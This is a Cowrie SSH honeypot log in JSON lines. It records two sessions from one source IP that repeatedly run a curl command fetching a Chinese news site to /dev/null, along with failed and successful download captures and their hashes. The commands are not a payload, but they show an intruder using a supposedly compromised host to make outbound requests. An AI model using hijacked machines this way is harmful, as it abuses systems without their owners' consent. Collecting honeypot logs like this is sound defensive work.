{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.982276Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:28.984077Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:28.985161Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.026417Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.028388Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.029803Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.032488Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.034208Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.035120Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.068001Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.069421Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.073381Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.074421Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.077494Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.079472Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.118383Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.119520Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.123497Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.124501Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.135329Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.136391Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.156439Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.167073Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.168147Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.178887Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.180030Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.196147Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.198357Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.225383Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.233789Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.238616Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.257778Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.259046Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.261122Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.275850Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.277275Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.283062Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.311181Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.312824Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.313918Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.335631Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.336981Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.339460Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.353658Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.355013Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.382910Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.384577Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.388074Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.392573Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.395846Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.397229Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.424423Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.426169Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.429752Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.432266Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.434180Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.435650Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.467698Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.469903Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.508116Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.510155Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.521086Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.522701Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.526947Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.528182Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.549232Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.551479Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.593811Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.596136Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.632837Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.634732Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.639912Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.641328Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.643145Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.645776Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.674021Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.675238Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.681646Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.682857Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.709795Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.711028Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.713014Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.714607Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.719836Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.721127Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.749825Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.752231Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.758461Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.759985Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.767166Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.768259Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.786652Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.787991Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.808967Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.810290Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.832371Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.872199Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.876393Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.904827Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.906382Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.912969Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.914410Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.936611Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.938064Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.953582Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.955492Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.959329Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.960651Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:29.983538Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.985262Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:29.996209Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.002565Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.004020Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.022802Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.024094Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.029003Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.032703Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.059848Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.064287Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.065892Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:30.071328Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:30.072671Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
